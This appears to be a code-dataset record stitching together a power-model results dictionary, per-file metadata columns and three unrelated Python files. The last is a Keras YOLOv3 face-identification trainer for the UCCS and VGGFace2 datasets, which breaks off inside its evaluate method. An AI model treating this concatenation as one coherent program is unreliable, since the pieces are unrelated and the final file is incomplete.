'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0279431,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0303917,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.31892,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 6.491265765435208,
'Runtime Dynamic': 6.491265765435208,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.307945,
'Runtime Dynamic': 0.0997527,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 55.2759,
'Peak Power': 88.3881,
'Runtime Dynamic': 6.57742,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 54.968,
'Total Cores/Runtime Dynamic': 6.47767,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.307945,
'Total L3s/Runtime Dynamic': 0.0997527,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.068928
| 124
| 0.682101
| 8,082
| 68,613
| 5.78483
| 0.064959
| 0.123543
| 0.112934
| 0.093427
| 0.940966
| 0.933673
| 0.92069
| 0.895771
| 0.867324
| 0.848459
| 0
| 0.132013
| 0.224316
| 68,613
| 914
| 125
| 75.068928
| 0.746439
| 0
| 0
| 0.664114
| 0
| 0
| 0.657373
| 0.048095
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a888099df09f7dd54d046c8dd70b4c083d743552
| 174
|
py
|
Python
|
opengrid_dev/__init__.py
|
opengridcc/opengrid_dev
|
cc6dc9d615197e4901a8d213fe81fc71bcd602c4
|
[
"Apache-2.0"
] | 8
|
2018-03-29T08:36:10.000Z
|
2022-02-07T12:48:46.000Z
|
opengrid_dev/__init__.py
|
opengridcc/opengrid_dev
|
cc6dc9d615197e4901a8d213fe81fc71bcd602c4
|
[
"Apache-2.0"
] | 2
|
2017-11-06T18:32:02.000Z
|
2017-11-06T20:23:39.000Z
|
opengrid_dev/__init__.py
|
opengridcc/opengrid_dev
|
cc6dc9d615197e4901a8d213fe81fc71bcd602c4
|
[
"Apache-2.0"
] | 2
|
2017-11-10T12:30:27.000Z
|
2019-04-15T16:32:25.000Z
|
from opengrid_dev.config import *
from opengrid_dev.library import *
from opengrid_dev.recipes import *
from pint import UnitRegistry
ureg = UnitRegistry()
Q_ = ureg.Quantity
| 29
| 34
| 0.816092
| 24
| 174
| 5.75
| 0.5
| 0.26087
| 0.326087
| 0.304348
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12069
| 174
| 6
| 35
| 29
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a8d2327f440a2074ee3ff22ab6189caf4762ee84
| 1,142
|
py
|
Python
|
code_and_dataset/result_collector.py
|
pcpLiu/DeepSeqPanII
|
86ce7675a1c69fd6059216d98b1e65e315ace3eb
|
[
"MIT"
] | 11
|
2019-10-30T12:41:56.000Z
|
2021-11-17T02:45:52.000Z
|
code_and_dataset/result_collector.py
|
pcpLiu/DeepSeqPanII
|
86ce7675a1c69fd6059216d98b1e65e315ace3eb
|
[
"MIT"
] | 2
|
2020-12-18T00:02:54.000Z
|
2021-11-19T02:33:37.000Z
|
code_and_dataset/result_collector.py
|
pcpLiu/DeepSeqPanII
|
86ce7675a1c69fd6059216d98b1e65e315ace3eb
|
[
"MIT"
] | 3
|
2020-03-09T06:25:20.000Z
|
2021-08-02T11:36:46.000Z
|
import sys, os
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
def collect_result():
"""Collect result from [weekly_result_METRICS_IGNORE_LENGTH.txt] from dup
"""
dup = int(sys.argv[2])
bd = sys.argv[1]
out_file = open('RESULT_COLLECTOR_{}.txt'.format(bd), 'w')
for i in range(dup):
result_file = os.path.join(BASE_DIR, '{}/dup_{}/weekly_result_METRICS_IGNORE_LENGTH.txt'.format(bd, i))
with open(result_file, 'r') as f:
for line in f:
pass
out_file.write(line)
def collect_result2():
"""Collect result from [weekly_result_METRICS_IGNORE_IEDB_ID_AND_LENGTH.txt] from dup
"""
dup = int(sys.argv[2])
bd = sys.argv[1]
out_file = open('RESULT_COLLECTOR_IGNORE_IEDB_{}.txt'.format(bd), 'w')
for i in range(dup):
result_file = os.path.join(BASE_DIR, '{}/dup_{}/weekly_result_METRICS_IGNORE_IEDB_ID_AND_LENGTH.txt'.format(bd, i))
with open(result_file, 'r') as f:
for line in f:
pass
out_file.write(line)
if __name__ == "__main__":
collect_result()
collect_result2()
| 30.052632
| 123
| 0.631349
| 167
| 1,142
| 3.976048
| 0.287425
| 0.036145
| 0.114458
| 0.150602
| 0.807229
| 0.807229
| 0.807229
| 0.718373
| 0.718373
| 0.653614
| 0
| 0.006849
| 0.232925
| 1,142
| 37
| 124
| 30.864865
| 0.751142
| 0.138354
| 0
| 0.56
| 0
| 0
| 0.18595
| 0.173554
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0.08
| 0.04
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
767b0c987f595bd7a221810e477d4c18edefcda0
| 77,806
|
py
|
Python
|
src/space/face_identification.py
|
tonandr/face_reg_yolov3
|
72d84b3d53e11527eb3de0ee2aff9766767b7865
|
[
"MIT"
] | 4
|
2019-06-22T15:56:54.000Z
|
2020-12-03T07:41:15.000Z
|
src/space/face_identification.py
|
tonandr/face_reg_yolov3
|
72d84b3d53e11527eb3de0ee2aff9766767b7865
|
[
"MIT"
] | null | null | null |
src/space/face_identification.py
|
tonandr/face_reg_yolov3
|
72d84b3d53e11527eb3de0ee2aff9766767b7865
|
[
"MIT"
] | 1
|
2021-09-14T03:53:20.000Z
|
2021-09-14T03:53:20.000Z
|
'''
MIT License
Copyright (c) 2019 Inwoo Chung
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
'''
Created on Apr 9, 2019
@author: Inwoo Chung (gutomitai@gmail.com)
'''
import os
import glob
import argparse
import time
import pickle
import platform
import shutil
from random import shuffle
import json
import numpy as np
import pandas as pd
import cv2 as cv
from skimage.io import imread, imsave
from scipy.linalg import norm
import h5py
import matplotlib.pyplot as plt
import ipyparallel as ipp
from keras.models import Model, load_model
from keras.layers import Input, Dense, Lambda, ZeroPadding2D
from keras.layers import LeakyReLU, Flatten, Concatenate, Reshape, ReLU
from keras.layers import Conv2DTranspose, BatchNormalization
from keras.layers.merge import add, subtract
from keras.utils import multi_gpu_model
from keras.utils.data_utils import Sequence
import keras.backend as K
from keras import optimizers
from keras.engine.input_layer import InputLayer
from yolov3_detect import make_yolov3_model, BoundBox, WeightReader, draw_boxes_v3
from face_detection import FaceDetector
# Constants.
DEBUG = True
ALPHA = 0.2
RESOURCE_TYPE_UCCS = 'uccs'
RESOURCE_TYPE_VGGFACE2 = 'vggface2'
def triplet_loss(y_true, y_pred):
# Calculate the difference of both face features and judge a same person.
x = y_pred
return K.mean(K.maximum(K.sqrt(K.sum(K.pow(x[:, 0:64] - x[:, 64:128], 2.0), axis=-1)) \
- K.sqrt(K.sum(K.pow(x[:, 0:64] - x[:, 128:192], 2.0), axis=-1)) + ALPHA, 0.))
def create_db_fi(conf):
"""Create db for face identifier."""
conf = conf['fi_conf']
if conf['resource_type'] == RESOURCE_TYPE_UCCS:
raw_data_path = conf['raw_data_path']
nn_arch = conf['nn_arch']
if not os.path.isdir(os.path.join(raw_data_path, 'subject_faces')):
os.mkdir(os.path.join(raw_data_path, 'subject_faces'))
else:
shutil.rmtree(os.path.join(raw_data_path, 'subject_faces'))
os.mkdir(os.path.join(os.path.join(raw_data_path, 'subject_faces')))
gt_df = pd.read_csv(os.path.join(raw_data_path, 'training', 'training.csv'))
gt_df_g = gt_df.groupby('SUBJECT_ID')
# Collect face region images and create db, by subject ids.
db = pd.DataFrame(columns=['subject_id', 'face_file', 'w', 'h'])
for k in gt_df_g.groups.keys():
if k == -1: continue
df = gt_df_g.get_group(k)
for i in range(df.shape[0]):
file_name = df.iloc[i, 1]
# Load an image.
image = imread(os.path.join(raw_data_path, 'training', file_name))
# Check exception.
res = df.iloc[i, 3:] > 0
if res.all() == False:
continue
# Crop a face region.
l, t, r, b = (int(df.iloc[i, 3])
, int(df.iloc[i, 4])
, int((df.iloc[i, 3] + df.iloc[i, 5] - 1))
, int((df.iloc[i, 4] + df.iloc[i, 6] - 1)))
image = image[(t - 1):(b - 1), (l - 1):(r - 1), :]
# Adjust the original image size into the normalized image size according to the ratio of width, height.
w = image.shape[1]
h = image.shape[0]
pad_t, pad_b, pad_l, pad_r = 0, 0, 0, 0
if w >= h:
w_p = nn_arch['image_size']
h_p = int(h / w * nn_arch['image_size'])
pad = nn_arch['image_size'] - h_p
if pad % 2 == 0:
pad_t = pad // 2
pad_b = pad // 2
else:
pad_t = pad // 2
pad_b = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_NEAREST)
image = cv.copyMakeBorder(image, pad_t, pad_b, 0, 0, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
else:
h_p = nn_arch['image_size']
w_p = int(w / h * nn_arch['image_size'])
pad = nn_arch['image_size'] - w_p
if pad % 2 == 0:
pad_l = pad // 2
pad_r = pad // 2
else:
pad_l = pad // 2
pad_r = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_NEAREST)
image = cv.copyMakeBorder(image, 0, 0, pad_l, pad_r, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
# Write a face region image.
face_file_name = file_name[:-4] + '_' + str(k) + '_' \
+ str(int(df.iloc[i, 3])) + '_' + str(int(df.iloc[i, 4])) + file_name[-4:]
print('Save ' + face_file_name)
imsave(os.path.join(raw_data_path, 'subject_faces', face_file_name), (image).astype('uint8'))
# Add subject face information into db.
db = pd.concat([db, pd.DataFrame({'subject_id': [k]
, 'face_file': [face_file_name]
, 'w': [w]
, 'h': [h]})])
# Save db.
db.to_csv('subject_image_db.csv')
elif conf['resource_type'] == RESOURCE_TYPE_VGGFACE2:
raw_data_path = conf['raw_data_path']
nn_arch = conf['nn_arch']
# Collect face region images and create db, by subject ids.
pClient = ipp.Client()
pView = pClient[:]
pView.push({'raw_data_path': raw_data_path, 'nn_arch': nn_arch})
with pView.sync_imports():
import numpy as np
import pandas as pd
import cv2 as cv
from skimage.io import imread, imsave
if not os.path.isdir(os.path.join(raw_data_path, 'subject_faces_vggface2')):
os.mkdir(os.path.join(raw_data_path, 'subject_faces_vggface2'))
else:
shutil.rmtree(os.path.join(raw_data_path, 'subject_faces_vggface2'))
os.mkdir(os.path.join(os.path.join(raw_data_path, 'subject_faces_vggface2')))
df = pd.read_csv(os.path.join(raw_data_path, 'loose_bb_train.csv'))
db = pd.DataFrame(columns=['subject_id', 'face_file', 'w', 'h'])
dfs = [df.iloc[i] for i in range(df.shape[0])]
#dfs = [df.iloc[i] for i in range(100)]
res = pView.map_sync(save_extracted_face, dfs)
try:
res.remove(None)
except:
pass
db = pd.concat(res)
# Save db.
db.to_csv('subject_image_vggface2_db.csv')
else:
raise ValueError('resource type is not valid.')
def save_extracted_face(df):
global raw_data_path, nn_arch
import os
cv = cv2
pd = pandas
np = numpy
id_filename = df.iloc[0].split('/')
identity = id_filename[0]
file_name = id_filename[1] + '.jpg'
x = df.iloc[1]
y = df.iloc[2]
w = df.iloc[3]
h = df.iloc[4]
if x < 0 or y < 0 or w <=0 or h <=0:
return None
# Load an image.
image = imread(os.path.join(raw_data_path, 'train', identity, file_name))
# Get a face region.
image = image[y:(y + h), x:(x + w), :]
# Adjust the original image size into the normalized image size according to the ratio of width, height.
w = image.shape[1]
h = image.shape[0]
pad_t, pad_b, pad_l, pad_r = 0, 0, 0, 0
if w >= h:
w_p = nn_arch['image_size']
h_p = int(h / w * nn_arch['image_size'])
pad = nn_arch['image_size'] - h_p
if pad % 2 == 0:
pad_t = pad // 2
pad_b = pad // 2
else:
pad_t = pad // 2
pad_b = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_NEAREST)
image = cv.copyMakeBorder(image, pad_t, pad_b, 0, 0, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
else:
h_p = nn_arch['image_size']
w_p = int(w / h * nn_arch['image_size'])
pad = nn_arch['image_size'] - w_p
if pad % 2 == 0:
pad_l = pad // 2
pad_r = pad // 2
else:
pad_l = pad // 2
pad_r = pad // 2 + 1
image = cv.resize(image, (w_p, h_p), interpolation=cv.INTER_NEAREST)
image = cv.copyMakeBorder(image, 0, 0, pad_l, pad_r, cv.BORDER_CONSTANT, value=[0, 0, 0]) # 416x416?
# Write a face region image.
face_file_name = identity + '_' + file_name
print('Save ' + face_file_name)
imsave(os.path.join(raw_data_path, 'subject_faces_vggface2', face_file_name), (image).astype('uint8'))
# Add subject face information into db.
return pd.DataFrame({'subject_id': [identity]
, 'face_file': [face_file_name]
, 'w': [w]
, 'h': [h]})
class FaceIdentifier(object):
"""Face identifier to use yolov3."""
# Constants.
MODEL_PATH = 'face_identifier.h5'
def __init__(self, conf):
"""
Parameters
----------
conf: dictionary
Face detector configuration dictionary.
"""
# Initialize.
self.conf = conf['fi_conf']
self.raw_data_path = self.conf['raw_data_path']
self.hps = self.conf['hps']
self.nn_arch = self.conf['nn_arch']
self.model_loading = self.conf['model_loading']
if self.model_loading:
if self.conf['multi_gpu']:
self.model = load_model(self.MODEL_PATH, custom_objects={'triplet_loss': triplet_loss})
self.parallel_model = multi_gpu_model(self.model, gpus=self.conf['num_gpus'])
opt = optimizers.Adam(lr=self.hps['lr']
, beta_1=self.hps['beta_1']
, beta_2=self.hps['beta_2']
, decay=self.hps['decay'])
self.parallel_model.compile(optimizer=opt, loss=triplet_loss)
else:
self.model = load_model(self.MODEL_PATH, custom_objects={'triplet_loss': triplet_loss})
else:
# Design the face identification model.
# Inputs.
input_a = Input(shape=(self.nn_arch['image_size'], self.nn_arch['image_size'], 3), name='input_a')
input_p = Input(shape=(self.nn_arch['image_size'], self.nn_arch['image_size'], 3), name='input_p')
input_n = Input(shape=(self.nn_arch['image_size'], self.nn_arch['image_size'], 3), name='input_n')
# Load yolov3 as the base model.
base = self.YOLOV3Base
base.name = 'base'
# Get triplet facial ids.
xa = base(input_a) # Non-linear.
xa = Flatten()(xa)
c_dense_layer = Dense(self.nn_arch['dense1_dim'], activation='relu', name='dense1')
l2_norm_layer = Lambda(lambda x: K.l2_normalize(x, axis=-1), name='l2_norm_layer')
xa = c_dense_layer(xa)
xa = l2_norm_layer(xa)
xp = base(input_p)
xp = Flatten()(xp)
xp = c_dense_layer(xp)
xp = l2_norm_layer(xp)
xn = base(input_n)
xn = Flatten()(xn)
xn = c_dense_layer(xn)
xn = l2_norm_layer(xn)
output = Concatenate(name='output')([xa, xp, xn]) #?
if self.conf['multi_gpu']:
self.model = Model(inputs=[input_a, input_p, input_n], outputs=[output])
opt = optimizers.Adam(lr=self.hps['lr']
, beta_1=self.hps['beta_1']
, beta_2=self.hps['beta_2']
, decay=self.hps['decay'])
self.model.compile(optimizer=opt, loss=triplet_loss)
self.model.summary()
self.parallel_model = multi_gpu_model(Model(inputs=[input_a, input_p, input_n], outputs=[output])
, gpus=self.conf['num_gpus'])
self.parallel_model.compile(optimizer=opt, loss=triplet_loss)
self.parallel_model.summary()
else:
self.model = Model(inputs=[input_a, input_p, input_n], outputs=[output])
opt = optimizers.Adam(lr=self.hps['lr']
, beta_1=self.hps['beta_1']
, beta_2=self.hps['beta_2']
, decay=self.hps['decay'])
self.model.compile(optimizer=opt, loss=triplet_loss)
self.model.summary()
# Create face detector.
self.fd = FaceDetector(conf['fd_conf'])
# Make fid extractor and face identifier.
self._make_fid_extractor()
def _make_fid_extractor(self):
"""Make facial id extractor."""
# Design the face identification model.
# Inputs.
input1 = Input(shape=(self.nn_arch['image_size'], self.nn_arch['image_size'], 3), name='input1')
# Load yolov3 as the base model.
base = self.model.get_layer('base')
# Get facial id.
x = base(input1) # Non-linear.
x = Flatten()(x)
x = self.model.get_layer('dense1')(x)
x = self.model.get_layer('l2_norm_layer')(x)
facial_id = x
self.fid_extractor = Model(inputs=[input1], outputs=[facial_id])
@property
def YOLOV3Base(self):
"""Get yolov3 as a base model.
Returns
-------
Model of Keras
Partial yolo3 model from the input layer to the add_23 layer
"""
if self.conf['yolov3_base_model_load']:
base = load_model('yolov3_base.h5')
base.trainable = True
return base
yolov3 = make_yolov3_model()
# Load the weights.
weight_reader = WeightReader('yolov3.weights')
weight_reader.load_weights(yolov3)
# Make a base model.
input1 = Input(shape=(self.nn_arch['image_size'], self.nn_arch['image_size'], 3), name='input1')
# 0 ~ 1.
conv_layer = yolov3.get_layer('conv_' + str(0))
x = ZeroPadding2D(1)(input1) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(0))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
conv_layer = yolov3.get_layer('conv_' + str(1))
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(1))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
skip = x
# 2 ~ 3.
for i in range(2, 4, 2):
conv_layer = yolov3.get_layer('conv_' + str(i))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
conv_layer = yolov3.get_layer('conv_' + str(i + 1))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i + 1))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
x = add([skip, x]) #?
# 5.
conv_layer = yolov3.get_layer('conv_' + str(5))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(5))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
skip = x
# 6 ~ 10.
for i in range(6, 10, 3):
conv_layer = yolov3.get_layer('conv_' + str(i))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
conv_layer = yolov3.get_layer('conv_' + str(i + 1))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i + 1))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
x = add([skip, x]) #?
skip = x #?
# 12.
conv_layer = yolov3.get_layer('conv_' + str(12))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(12))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
skip = x
# 13 ~ 35.
for i in range(13, 35, 3):
conv_layer = yolov3.get_layer('conv_' + str(i))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
conv_layer = yolov3.get_layer('conv_' + str(i + 1))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i + 1))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
x = add([skip, x]) #?
skip = x #?
# 37.
conv_layer = yolov3.get_layer('conv_' + str(37))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(37))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
skip = x
# 38 ~ 60.
for i in range(38, 60, 3):
conv_layer = yolov3.get_layer('conv_' + str(i))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
conv_layer = yolov3.get_layer('conv_' + str(i + 1))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i + 1))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
x = add([skip, x]) #?
skip = x #?
# 62.
conv_layer = yolov3.get_layer('conv_' + str(62))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(62))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
skip = x
# 63 ~ 73.
for i in range(63, 73, 3):
conv_layer = yolov3.get_layer('conv_' + str(i))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
conv_layer = yolov3.get_layer('conv_' + str(i + 1))
if conv_layer.kernel_size[0] > 1:
x = ZeroPadding2D(1)(x) #?
x = conv_layer(x)
norm_layer = yolov3.get_layer('bnorm_' + str(i + 1))
x = norm_layer(x)
x = LeakyReLU(alpha=0.1)(x)
x = add([skip, x]) #?
skip = x #?
output = x
base = Model(inputs=[input1], outputs=[output])
base.trainable = True
base.save('yolov3_base.h5')
return base
def train(self):
"""Train face detector."""
if self.conf['resource_type'] == RESOURCE_TYPE_UCCS:
trGen = self.TrainingSequence(self.raw_data_path, self.hps, self.nn_arch, load_flag=False)
elif self.conf['resource_type'] == RESOURCE_TYPE_VGGFACE2:
trGen = self.TrainingSequenceVGGFace2(self.raw_data_path, self.hps, self.nn_arch, load_flag=False)
else:
raise ValueError('resource type is not valid.')
if self.conf['multi_gpu']:
self.parallel_model.fit_generator(trGen
, steps_per_epoch=self.hps['step'] #?
, epochs=self.hps['epochs']
, verbose=1
, max_queue_size=400
, workers=8
, use_multiprocessing=True)
else:
self.model.fit_generator(trGen
, steps_per_epoch=self.hps['step']
, epochs=self.hps['epochs']
, verbose=1
, max_queue_size=100
, workers=4
, use_multiprocessing=True)
print('Save the model.')
self.model.save(self.MODEL_PATH)
def make_facial_ids_db(self):
"""Make facial ids database."""
if self.conf['resource_type'] == RESOURCE_TYPE_UCCS:
db = pd.read_csv('subject_image_db.csv')
db = db.iloc[:, 1:]
db_g = db.groupby('subject_id')
with h5py.File('subject_facial_ids.h5', 'w') as f:
for subject_id in db_g.groups.keys():
if subject_id == -1:
continue
# Get face images of a subject id.
df = db_g.get_group(subject_id)
images = []
for ff in list(df.iloc[:, 1]):
image = imread(os.path.join(self.raw_data_path, 'subject_faces', ff))
images.append(image/255)
images = np.asarray(images)
# Calculate facial ids and an averaged facial id of a subject id. Mean, Mode, Median?
facial_ids = self.fid_extractor.predict(images)
for k, ff in enumerate(list(df.iloc[:, 1])):
f[ff] = facial_ids[k]
f[ff].attrs['subject_id'] = subject_id
elif self.conf['resource_type'] == RESOURCE_TYPE_VGGFACE2:
db = pd.read_csv('subject_image_vggface2_db.csv')
db = db.iloc[:, 1:]
db_g = db.groupby('subject_id')
with h5py.File('subject_facial_vggface2_ids.h5', 'w') as f:
for subject_id in db_g.groups.keys():
if subject_id == -1:
continue
# Get face images of a subject id.
df = db_g.get_group(subject_id)
images = []
for ff in list(df.iloc[:, 1]):
image = imread(os.path.join(self.raw_data_path, 'subject_faces_vggface2', ff)) #?
images.append(image/255)
images = np.asarray(images)
# Calculate facial ids and an averaged facial id of a subject id. Mean, Mode, Median?
facial_ids = self.fid_extractor.predict(images)
for k, ff in enumerate(list(df.iloc[:, 1])):
f[ff] = facial_ids[k]
f[ff].attrs['subject_id'] = subject_id
else:
raise ValueError('resource type is not valid.')
def register_facial_ids(self):
"""Register facial ids."""
if self.conf['resource_type'] == RESOURCE_TYPE_UCCS:
db = pd.read_csv('subject_image_db.csv')
db = db.iloc[:, 1:]
db_g = db.groupby('subject_id')
db_facial_id = pd.DataFrame(columns=['subject_id', 'facial_id'])
for subject_id in db_g.groups.keys():
if subject_id == -1:
continue
# Get face images of a subject id.
df = db_g.get_group(subject_id)
images = []
for ff in list(df.iloc[:, 1]):
image = imread(os.path.join(self.raw_data_path, 'subject_faces', ff))
images.append(image/255)
images = np.asarray(images)
# Calculate facial ids and an averaged facial id of a subject id. Mean, Mode, Median?
facial_ids = self.fid_extractor.predict(images)
facial_id = np.asarray(pd.DataFrame(facial_ids).mean())
db_facial_id = pd.concat([db_facial_id, pd.DataFrame({'subject_id': [subject_id]
, 'facial_id': [facial_id]})])
# Save db.
db_facial_id.index = db_facial_id.subject_id
db_facial_id = db_facial_id.to_dict()['facial_id']
with open('ref_facial_id_db.pickle', 'wb') as f:
pickle.dump(db_facial_id, f)
elif self.conf['resource_type'] == RESOURCE_TYPE_VGGFACE2:
"""Register facial ids."""
db = pd.read_csv('subject_image_vggface2_db.csv')
db = db.iloc[:, 1:]
db_g = db.groupby('subject_id')
db_facial_id = pd.DataFrame(columns=['subject_id', 'facial_id'])
for subject_id in db_g.groups.keys():
if subject_id == -1:
continue
# Get face images of a subject id.
df = db_g.get_group(subject_id)
images = []
for ff in list(df.iloc[:, 1]):
image = imread(os.path.join(self.raw_data_path, 'subject_faces_vggface2', ff))
images.append(image/255)
images = np.asarray(images)
# Calculate facial ids and an averaged facial id of a subject id. Mean, Mode, Median?
facial_ids = self.fid_extractor.predict(images)
facial_id = np.asarray(pd.DataFrame(facial_ids).mean())
db_facial_id = pd.concat([db_facial_id, pd.DataFrame({'subject_id': [subject_id]
, 'facial_id': [facial_id]})])
# Save db.
db_facial_id.index = db_facial_id.subject_id
db_facial_id = db_facial_id.to_dict()['facial_id']
with open('ref_facial_id_vggface2_db.pickle', 'wb') as f:
pickle.dump(db_facial_id, f)
def evaluate(self):
"""Evaluate."""
test_path = self.conf['test_path']
output_file_path = self.conf['output_file_path']
if not os.path.isdir(os.path.join(test_path, 'results_fi')):
os.mkdir(os.path.join(test_path, 'results_fi'))
